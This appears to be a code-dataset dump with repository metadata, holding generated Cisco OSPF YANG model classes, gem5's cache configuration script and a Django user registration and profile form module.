self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])),
])
self.lsa_data = []
self._segment_path = lambda: "unsupported-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, ['lsa_data'], name, value)
class RouterLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, self).__init__()
self.yang_name = "router-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])),
('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])),
])
self.router_lsa_bits = Bits()
self.router_lsa_number_links = None
self._segment_path = lambda: "router-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value)
class NetworkLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, self).__init__()
self.yang_name = "network-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])),
('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])),
])
self.network_lsa_mask = None
self.network_attached_routers = []
self._segment_path = lambda: "network-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value)
class NetworkSummaryLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, self).__init__()
self.yang_name = "network-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "network-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, ['summary_lsa_mask'], name, value)
class SummaryTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "network-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class RouterSummaryLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, self).__init__()
self.yang_name = "router-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "router-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, ['summary_lsa_mask'], name, value)
class SummaryTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "router-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class ExternalLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, self).__init__()
self.yang_name = "external-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo))])
self._leafs = OrderedDict([
('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
])
self.external_lsa_mask = None
self.external_topo = YList(self)
self._segment_path = lambda: "external-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, ['external_lsa_mask'], name, value)
class ExternalTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, self).__init__()
self.yang_name = "external-topo"
self.yang_parent_name = "external-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
])
self.mt_id = None
self.topo_metric_type = None
self.topo_metric = None
self.topo_forwarding_address = None
self.topo_route_tag = None
self._segment_path = lambda: "external-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
class NssaLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, self).__init__()
self.yang_name = "nssa-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo))])
self._leafs = OrderedDict([
('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
])
self.external_lsa_mask = None
self.external_topo = YList(self)
self._segment_path = lambda: "nssa-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, ['external_lsa_mask'], name, value)
class ExternalTopo(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, self).__init__()
self.yang_name = "external-topo"
self.yang_parent_name = "nssa-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
])
self.mt_id = None
self.topo_metric_type = None
self.topo_metric = None
self.topo_forwarding_address = None
self.topo_route_tag = None
self._segment_path = lambda: "external-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
def clone_ptr(self):
self._top_entity = OspfOperData()
return self._top_entity
| true
| true
|
f705ab09a5963cd25258cf441567b8cdaf1b0983
| 10,096
|
py
|
Python
|
configs/common/CacheConfig.py
|
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
|
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
|
[
"BSD-3-Clause"
] | 3
|
2019-07-19T22:52:27.000Z
|
2020-05-26T04:37:46.000Z
|
configs/common/CacheConfig.py
|
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
|
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
|
[
"BSD-3-Clause"
] | 1
|
2019-07-22T16:41:56.000Z
|
2019-07-22T16:41:56.000Z
|
configs/common/CacheConfig.py
|
seanzw/UCLA-CS259-MachinesThatLearn-TensorCore
|
aece7fcdf97d2864fbb31e02940bfcdd470db7b9
|
[
"BSD-3-Clause"
] | 2
|
2019-06-26T14:33:42.000Z
|
2019-10-02T02:09:23.000Z
|
# Copyright (c) 2012-2013, 2015-2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2010 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Lisa Hsu
# Configure the M5 cache hierarchy config in one place
#
from __future__ import print_function
from __future__ import absolute_import
import m5
from m5.objects import *
from .Caches import *
from . import HWPConfig
def config_cache(options, system):
if options.external_memory_system and (options.caches or options.l2cache):
print("External caches and internal caches are exclusive options.\n")
sys.exit(1)
if options.external_memory_system:
ExternalCache = ExternalCacheFactory(options.external_memory_system)
if options.cpu_type == "O3_ARM_v7a_3":
try:
import cores.arm.O3_ARM_v7a as core
except:
print("O3_ARM_v7a_3 is unavailable. Did you compile the O3 model?")
sys.exit(1)
dcache_class, icache_class, l2_cache_class, walk_cache_class = \
core.O3_ARM_v7a_DCache, core.O3_ARM_v7a_ICache, \
core.O3_ARM_v7aL2, \
core.O3_ARM_v7aWalkCache
elif options.cpu_type == "HPI":
try:
import cores.arm.HPI as core
except:
print("HPI is unavailable.")
sys.exit(1)
dcache_class, icache_class, l2_cache_class, walk_cache_class = \
core.HPI_DCache, core.HPI_ICache, core.HPI_L2, core.HPI_WalkCache
else:
dcache_class, icache_class, l2_cache_class, walk_cache_class = \
L1_DCache, L1_ICache, L2Cache, None
if buildEnv['TARGET_ISA'] == 'x86':
walk_cache_class = PageTableWalkerCache
# Set the cache line size of the system
system.cache_line_size = options.cacheline_size
# If elastic trace generation is enabled, make sure the memory system is
# minimal so that compute delays do not include memory access latencies.
# Configure the compulsory L1 caches for the O3CPU, do not configure
# any more caches.
if options.l2cache and options.elastic_trace_en:
fatal("When elastic trace is enabled, do not configure L2 caches.")
if options.l2cache:
# Provide a clock for the L2 and the L1-to-L2 bus here as they
# are not connected using addTwoLevelCacheHierarchy. Use the
# same clock as the CPUs.
system.l2 = l2_cache_class(clk_domain=system.cpu_clk_domain,
size=options.l2_size,
assoc=options.l2_assoc)
system.tol2bus = L2XBar(clk_domain = system.cpu_clk_domain)
system.l2.cpu_side = system.tol2bus.master
system.l2.mem_side = system.membus.slave
if options.l2_hwp_type:
hwpClass = HWPConfig.get(options.l2_hwp_type)
if system.l2.prefetcher != "Null":
print("Warning: l2-hwp-type is set (", hwpClass, "), but",
"the current l2 has a default Hardware Prefetcher",
"of type", type(system.l2.prefetcher), ", using the",
"specified by the flag option.")
system.l2.prefetcher = hwpClass()
if options.memchecker:
system.memchecker = MemChecker()
for i in range(options.num_cpus):
if options.caches:
icache = icache_class(size=options.l1i_size,
assoc=options.l1i_assoc)
dcache = dcache_class(size=options.l1d_size,
assoc=options.l1d_assoc)
# If we have a walker cache specified, instantiate two
# instances here
if walk_cache_class:
iwalkcache = walk_cache_class()
dwalkcache = walk_cache_class()
else:
iwalkcache = None
dwalkcache = None
if options.memchecker:
dcache_mon = MemCheckerMonitor(warn_only=True)
dcache_real = dcache
# Do not pass the memchecker into the constructor of
# MemCheckerMonitor, as it would create a copy; we require
# exactly one MemChecker instance.
dcache_mon.memchecker = system.memchecker
# Connect monitor
dcache_mon.mem_side = dcache.cpu_side
# Let CPU connect to monitors
dcache = dcache_mon
if options.l1d_hwp_type:
hwpClass = HWPConfig.get(options.l1d_hwp_type)
if dcache.prefetcher != m5.params.NULL:
print("Warning: l1d-hwp-type is set (", hwpClass, "), but",
"the current l1d has a default Hardware Prefetcher",
"of type", type(dcache.prefetcher), ", using the",
"specified by the flag option.")
dcache.prefetcher = hwpClass()
if options.l1i_hwp_type:
hwpClass = HWPConfig.get(options.l1i_hwp_type)
if icache.prefetcher != m5.params.NULL:
print("Warning: l1i-hwp-type is set (", hwpClass, "), but",
"the current l1i has a default Hardware Prefetcher",
"of type", type(icache.prefetcher), ", using the",
"specified by the flag option.")
icache.prefetcher = hwpClass()
# When connecting the caches, the clock is also inherited
# from the CPU in question
system.cpu[i].addPrivateSplitL1Caches(icache, dcache,
iwalkcache, dwalkcache)
if options.memchecker:
# The mem_side ports of the caches haven't been connected yet.
# Make sure connectAllPorts connects the right objects.
system.cpu[i].dcache = dcache_real
system.cpu[i].dcache_mon = dcache_mon
elif options.external_memory_system:
# These port names are presented to whatever 'external' system
# gem5 is connecting to. Its configuration will likely depend
# on these names. For simplicity, we would advise configuring
# it to use this naming scheme; if this isn't possible, change
# the names below.
if buildEnv['TARGET_ISA'] in ['x86', 'arm']:
system.cpu[i].addPrivateSplitL1Caches(
ExternalCache("cpu%d.icache" % i),
ExternalCache("cpu%d.dcache" % i),
ExternalCache("cpu%d.itb_walker_cache" % i),
ExternalCache("cpu%d.dtb_walker_cache" % i))
else:
system.cpu[i].addPrivateSplitL1Caches(
ExternalCache("cpu%d.icache" % i),
ExternalCache("cpu%d.dcache" % i))
system.cpu[i].createInterruptController()
if options.l2cache:
system.cpu[i].connectAllPorts(system.tol2bus, system.membus)
elif options.external_memory_system:
system.cpu[i].connectUncachedPorts(system.membus)
else:
system.cpu[i].connectAllPorts(system.membus)
return system
# ExternalSlave provides a "port", but when that port connects to a cache,
# the connecting CPU SimObject wants to refer to its "cpu_side".
# The 'ExternalCache' class provides this adaptation by rewriting the name,
# eliminating distracting changes elsewhere in the config code.
class ExternalCache(ExternalSlave):
def __getattr__(cls, attr):
if (attr == "cpu_side"):
attr = "port"
return super(ExternalSlave, cls).__getattr__(attr)
def __setattr__(cls, attr, value):
if (attr == "cpu_side"):
attr = "port"
return super(ExternalSlave, cls).__setattr__(attr, value)
def ExternalCacheFactory(port_type):
def make(name):
return ExternalCache(port_data=name, port_type=port_type,
addr_ranges=[AllMemory])
return make
| 44.475771
| 79
| 0.639758
|
from __future__ import print_function
from __future__ import absolute_import
import m5
from m5.objects import *
from .Caches import *
from . import HWPConfig
def config_cache(options, system):
if options.external_memory_system and (options.caches or options.l2cache):
print("External caches and internal caches are exclusive options.\n")
sys.exit(1)
if options.external_memory_system:
ExternalCache = ExternalCacheFactory(options.external_memory_system)
if options.cpu_type == "O3_ARM_v7a_3":
try:
import cores.arm.O3_ARM_v7a as core
except:
print("O3_ARM_v7a_3 is unavailable. Did you compile the O3 model?")
sys.exit(1)
dcache_class, icache_class, l2_cache_class, walk_cache_class = \
core.O3_ARM_v7a_DCache, core.O3_ARM_v7a_ICache, \
core.O3_ARM_v7aL2, \
core.O3_ARM_v7aWalkCache
elif options.cpu_type == "HPI":
try:
import cores.arm.HPI as core
except:
print("HPI is unavailable.")
sys.exit(1)
dcache_class, icache_class, l2_cache_class, walk_cache_class = \
core.HPI_DCache, core.HPI_ICache, core.HPI_L2, core.HPI_WalkCache
else:
dcache_class, icache_class, l2_cache_class, walk_cache_class = \
L1_DCache, L1_ICache, L2Cache, None
if buildEnv['TARGET_ISA'] == 'x86':
walk_cache_class = PageTableWalkerCache
system.cache_line_size = options.cacheline_size
if options.l2cache and options.elastic_trace_en:
fatal("When elastic trace is enabled, do not configure L2 caches.")
if options.l2cache:
system.l2 = l2_cache_class(clk_domain=system.cpu_clk_domain,
size=options.l2_size,
assoc=options.l2_assoc)
system.tol2bus = L2XBar(clk_domain = system.cpu_clk_domain)
system.l2.cpu_side = system.tol2bus.master
system.l2.mem_side = system.membus.slave
if options.l2_hwp_type:
hwpClass = HWPConfig.get(options.l2_hwp_type)
if system.l2.prefetcher != "Null":
print("Warning: l2-hwp-type is set (", hwpClass, "), but",
"the current l2 has a default Hardware Prefetcher",
"of type", type(system.l2.prefetcher), ", using the",
"specified by the flag option.")
system.l2.prefetcher = hwpClass()
if options.memchecker:
system.memchecker = MemChecker()
for i in range(options.num_cpus):
if options.caches:
icache = icache_class(size=options.l1i_size,
assoc=options.l1i_assoc)
dcache = dcache_class(size=options.l1d_size,
assoc=options.l1d_assoc)
if walk_cache_class:
iwalkcache = walk_cache_class()
dwalkcache = walk_cache_class()
else:
iwalkcache = None
dwalkcache = None
if options.memchecker:
dcache_mon = MemCheckerMonitor(warn_only=True)
dcache_real = dcache
dcache_mon.memchecker = system.memchecker
dcache_mon.mem_side = dcache.cpu_side
dcache = dcache_mon
if options.l1d_hwp_type:
hwpClass = HWPConfig.get(options.l1d_hwp_type)
if dcache.prefetcher != m5.params.NULL:
print("Warning: l1d-hwp-type is set (", hwpClass, "), but",
"the current l1d has a default Hardware Prefetcher",
"of type", type(dcache.prefetcher), ", using the",
"specified by the flag option.")
dcache.prefetcher = hwpClass()
if options.l1i_hwp_type:
hwpClass = HWPConfig.get(options.l1i_hwp_type)
if icache.prefetcher != m5.params.NULL:
print("Warning: l1i-hwp-type is set (", hwpClass, "), but",
"the current l1i has a default Hardware Prefetcher",
"of type", type(icache.prefetcher), ", using the",
"specified by the flag option.")
icache.prefetcher = hwpClass()
system.cpu[i].addPrivateSplitL1Caches(icache, dcache,
iwalkcache, dwalkcache)
if options.memchecker:
# Make sure connectAllPorts connects the right objects.
system.cpu[i].dcache = dcache_real
system.cpu[i].dcache_mon = dcache_mon
elif options.external_memory_system:
# These port names are presented to whatever 'external' system
# gem5 is connecting to. Its configuration will likely depend
# on these names. For simplicity, we would advise configuring
# it to use this naming scheme; if this isn't possible, change
if buildEnv['TARGET_ISA'] in ['x86', 'arm']:
system.cpu[i].addPrivateSplitL1Caches(
ExternalCache("cpu%d.icache" % i),
ExternalCache("cpu%d.dcache" % i),
ExternalCache("cpu%d.itb_walker_cache" % i),
ExternalCache("cpu%d.dtb_walker_cache" % i))
else:
system.cpu[i].addPrivateSplitL1Caches(
ExternalCache("cpu%d.icache" % i),
ExternalCache("cpu%d.dcache" % i))
system.cpu[i].createInterruptController()
if options.l2cache:
system.cpu[i].connectAllPorts(system.tol2bus, system.membus)
elif options.external_memory_system:
system.cpu[i].connectUncachedPorts(system.membus)
else:
system.cpu[i].connectAllPorts(system.membus)
return system
class ExternalCache(ExternalSlave):
def __getattr__(cls, attr):
if (attr == "cpu_side"):
attr = "port"
return super(ExternalSlave, cls).__getattr__(attr)
def __setattr__(cls, attr, value):
if (attr == "cpu_side"):
attr = "port"
return super(ExternalSlave, cls).__setattr__(attr, value)
def ExternalCacheFactory(port_type):
def make(name):
return ExternalCache(port_data=name, port_type=port_type,
addr_ranges=[AllMemory])
return make
| true
| true
|
f705ab4544bccecfcecc8f47c620ff3d110450c3
| 4,475
|
py
|
Python
|
users/user_forms.py
|
dennisfarmer/texas-hospital-hackathon
|
dabf80a2c3d78d595280d4ff9475176da4848349
|
[
"MIT"
] | null | null | null |
users/user_forms.py
|
dennisfarmer/texas-hospital-hackathon
|
dabf80a2c3d78d595280d4ff9475176da4848349
|
[
"MIT"
] | null | null | null |
users/user_forms.py
|
dennisfarmer/texas-hospital-hackathon
|
dabf80a2c3d78d595280d4ff9475176da4848349
|
[
"MIT"
] | null | null | null |
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm
# from crispy_forms.helper import FormHelper
# from crispy_forms.layout import Submit
import sys
import os
from .models import User_Profile
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
from orders.models import Location, Location_Info
from orders.locations import get_location_choices
class UserCreationForm(BaseUserCreationForm):
name = forms.CharField(label="Full Name")
location_id = forms.ChoiceField(
label="Hospital Location:",
help_text="Select an option from the menu above.",
choices=get_location_choices())
email = forms.EmailField(
required=False,
label="Email",
help_text = "(not required)" )
phone = forms.CharField(
required=False,
max_length=12,
label="Mobile Number",
help_text="(not required)")
class Meta:
model = User
fields = [
"name",
"username",
"password1",
"password2",
"location_id",
"email",
"phone"
]
def save(self, commit=True, *args, **kwargs):
user = super(UserCreationForm, self).save(commit=False, *args, **kwargs)
name = self.cleaned_data["name"]
if len(name.split()) >= 2:
user.first_name, user.last_name = (name.split()[0].title(), name.split()[-1].title())
elif len(name.split()) == 1:
user.first_name = name.title()
user.last_name = ""
user.set_password(self.cleaned_data["password1"])
user.email = self.cleaned_data["email"]
if commit:
user.save()
user.profile.phone = self.cleaned_data["phone"]
location_id = int(self.cleaned_data["location_id"])
loc = Location(
username = user.username,
location_id = location_id,
info = Location_Info.objects.filter(pk=location_id).first()
)
loc.save()
user.profile.location = loc
user.profile.save()
user.save()
return user
class UserUpdateForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
email = kwargs.get("instance").email
super(UserUpdateForm, self).__init__(*args, **kwargs)
self.initial["email"] = email
# self.helper = FormHelper(self)
# self.helper.add_input(Submit("submit", "Submit", css_class="btn btn-outline-info"))
# self.helper.form_method = "POST"
email = forms.EmailField(
required=False,
label="Email",
help_text = "(not required)")
class Meta:
model = User
fields = ["username", "email"]
class ProfileUpdateForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
location_id = kwargs.get("instance").location.location_id
phone = kwargs.get("instance").phone
super(ProfileUpdateForm, self).__init__(*args, **kwargs)
self.initial["location_id"] = location_id
self.initial["phone"] = phone
# self.helper = FormHelper(self)
# self.helper.add_input(Submit("submit", "Submit", css_class="btn btn-outline-info"))
# self.helper.form_method = "POST"
location_id = forms.ChoiceField(
label="Hospital Location:",
help_text="Select an option from the menu above.",
choices=get_location_choices())
phone = forms.CharField(
required=False,
max_length=12,
label="Mobile Number",
help_text="(not required)")
class Meta:
model = User_Profile
fields = ["image", "location_id", "phone"]
def save(self, commit=True, *args, **kwargs):
profile = super(ProfileUpdateForm, self).save(commit=False, *args, **kwargs)
if commit:
profile.save()
profile.phone = self.cleaned_data["phone"]
new_location_id = int(self.cleaned_data["location_id"])
profile.location.delete()
new_location = Location(
username = self.instance.user.username,
location_id = new_location_id,
info = Location_Info.objects.filter(pk=new_location_id).first()
).save()
profile.location = new_location
profile.save()
return profile
| 33.646617
| 97
| 0.604469
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm as BaseUserCreationForm
import sys
import os
from .models import User_Profile
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
from orders.models import Location, Location_Info
from orders.locations import get_location_choices
class UserCreationForm(BaseUserCreationForm):
name = forms.CharField(label="Full Name")
location_id = forms.ChoiceField(
label="Hospital Location:",
help_text="Select an option from the menu above.",
choices=get_location_choices())
email = forms.EmailField(
required=False,
label="Email",
help_text = "(not required)" )
phone = forms.CharField(
required=False,
max_length=12,
label="Mobile Number",
help_text="(not required)")
class Meta:
model = User
fields = [
"name",
"username",
"password1",
"password2",
"location_id",
"email",
"phone"
]
def save(self, commit=True, *args, **kwargs):
user = super(UserCreationForm, self).save(commit=False, *args, **kwargs)
name = self.cleaned_data["name"]
if len(name.split()) >= 2:
user.first_name, user.last_name = (name.split()[0].title(), name.split()[-1].title())
elif len(name.split()) == 1:
user.first_name = name.title()
user.last_name = ""
user.set_password(self.cleaned_data["password1"])
user.email = self.cleaned_data["email"]
if commit:
user.save()
user.profile.phone = self.cleaned_data["phone"]
location_id = int(self.cleaned_data["location_id"])
loc = Location(
username = user.username,
location_id = location_id,
info = Location_Info.objects.filter(pk=location_id).first()
)
loc.save()
user.profile.location = loc
user.profile.save()
user.save()
return user
class UserUpdateForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
email = kwargs.get("instance").email
super(UserUpdateForm, self).__init__(*args, **kwargs)
self.initial["email"] = email
email = forms.EmailField(
required=False,
label="Email",
help_text = "(not required)")
class Meta:
model = User
fields = ["username", "email"]
class ProfileUpdateForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
location_id = kwargs.get("instance").location.location_id
phone = kwargs.get("instance").phone
super(ProfileUpdateForm, self).__init__(*args, **kwargs)
self.initial["location_id"] = location_id
self.initial["phone"] = phone
location_id = forms.ChoiceField(
label="Hospital Location:",
help_text="Select an option from the menu above.",
choices=get_location_choices())
phone = forms.CharField(
required=False,
max_length=12,
label="Mobile Number",
help_text="(not required)")
class Meta:
model = User_Profile
fields = ["image", "location_id", "phone"]
def save(self, commit=True, *args, **kwargs):
profile = super(ProfileUpdateForm, self).save(commit=False, *args, **kwargs)
if commit:
profile.save()
profile.phone = self.cleaned_data["phone"]
new_location_id = int(self.cleaned_data["location_id"])
profile.location.delete()
new_location = Location(
username = self.instance.user.username,
location_id = new_location_id,
info = Location_Info.objects.filter(pk=new_location_id).first()
).save()
profile.location = new_location
profile.save()
return profile
| true
| true
|
f705ab6b22fcd6f8fa7f8f53688eda2185ea5ef3
| 1,971
|
py
|
Python
|
WebDemo/flask_app/main.py
|
silenceliang/Cascading-agents-hybridSum
|
6c127df51bd8cc926878f62ebdb66bc1042bb58c
|
[
"MIT"
] | 1
|
2020-02-23T15:38:18.000Z
|
2020-02-23T15:38:18.000Z
|
WebDemo/flask_app/main.py
|
silenceliang/CascadingAgentsHybridSum
|
6c127df51bd8cc926878f62ebdb66bc1042bb58c
|
[
"MIT"
] | null | null | null |
WebDemo/flask_app/main.py
|
